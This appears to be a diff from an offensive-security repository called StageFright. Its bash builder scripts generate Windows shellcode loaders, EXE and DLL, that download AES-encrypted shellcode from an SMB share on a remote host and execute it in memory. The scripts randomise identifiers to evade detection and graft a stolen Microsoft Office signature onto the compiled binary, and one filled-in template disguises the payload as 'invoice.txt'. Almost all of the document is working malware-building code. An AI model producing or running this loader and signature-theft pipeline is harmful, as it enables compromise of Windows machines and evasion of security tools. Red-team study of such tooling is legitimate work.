+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/SMB/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/SMB/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/SMB/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/SMB/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE StageFright/SMB/Resources/template.cpp -Wno-narrowing -fpermissive -lws2_32 -lntdll -O2 >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+
+
+

StageFright/StageFright/StageFright/SMB/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/SMB/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random7[] = KEYVALUE
+
+int main() {
+    LPCWSTR szServer = L"HOSTNAME";
+    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
+
+    PBYTE Random8;
+    SIZE_T Random8Size;
+
+    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
+
+    if (success) {
+        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
+
+        success = Random2(Random8, Random8Size);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = Random8Size;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&Random8,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(Random8);
+    }
+
+    return success ? 0 : 1;
+}
+

StageFright/StageFright/StageFright/SMBDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMBDLL/Resources/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL ohztCLrjKceS(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL EpKOpQRlB(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int rABIYwtsiD(char* Random4, unsigned int zHUdE, char* nPincKr, size_t nPincKrlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)nPincKr, (DWORD)nPincKrlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &zHUdE)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char VTOBIBvhNOZy[] =  { 0xa4, 0x49, 0xc1, 0x91, 0xfc, 0x7a, 0x55, 0x44, 0x92, 0x9a, 0xab, 0x5d, 0xb, 0x95, 0x2e, 0xd6 };
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    LPCWSTR szServer = L"Win11Blue";
+    LPCWSTR szFilePath = L"Shared\\invoice.txt";
+
+    PBYTE ymluXTmiPBZPy;
+    SIZE_T ymluXTmiPBZPySize;
+
+    BOOL success = ohztCLrjKceS(szServer, szFilePath, &ymluXTmiPBZPy, &ymluXTmiPBZPySize);
+
+    if (success) {
+        rABIYwtsiD((char*)ymluXTmiPBZPy, ymluXTmiPBZPySize, VTOBIBvhNOZy, sizeof(VTOBIBvhNOZy));
+
+        success = EpKOpQRlB(ymluXTmiPBZPy, ymluXTmiPBZPySize);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = ymluXTmiPBZPySize;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&ymluXTmiPBZPy,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(ymluXTmiPBZPy);
+    }
+
+    return success ? 0 : 1;
+}
+

StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh

@@ -0,0 +1,181 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"          
+
+ _____ _                       _   ________  _________  ______ _      _     
+/  ___| |                     | | /  ___|  \/  || ___ \ |  _  \ |    | |    
+\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ / | | | | |    | |    
+ `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \ | | | | |    | |    
+/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ / | |/ /| |____| |____
+\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/  |___/ \_____/\_____/
+                 __/ |                                                      
+                |___/                                                       
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
+echo ""
+read SHAREFOLDER
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Entry Point Function"${clear}
+echo ""
+read ENTRYPOINT
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/SMBDLL/template.cpp StageFright/SMBDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/SMBDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/SMBDLL/conv.py StageFright/SMBDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/SMBDLL/Resources/con.py
+python3 StageFright/SMBDLL/Resources/con.py
+#rm StageFright/SMBDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/SMBDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMBDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/SMBDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/SMBDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/SMBDLL/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/SMBDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/SMBDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/SMBDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/SMBDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/SMBDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/SMBDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/SMBDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/SMBDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+
+
+

StageFright/StageFright/StageFright/SMBDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/SMBDLL/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
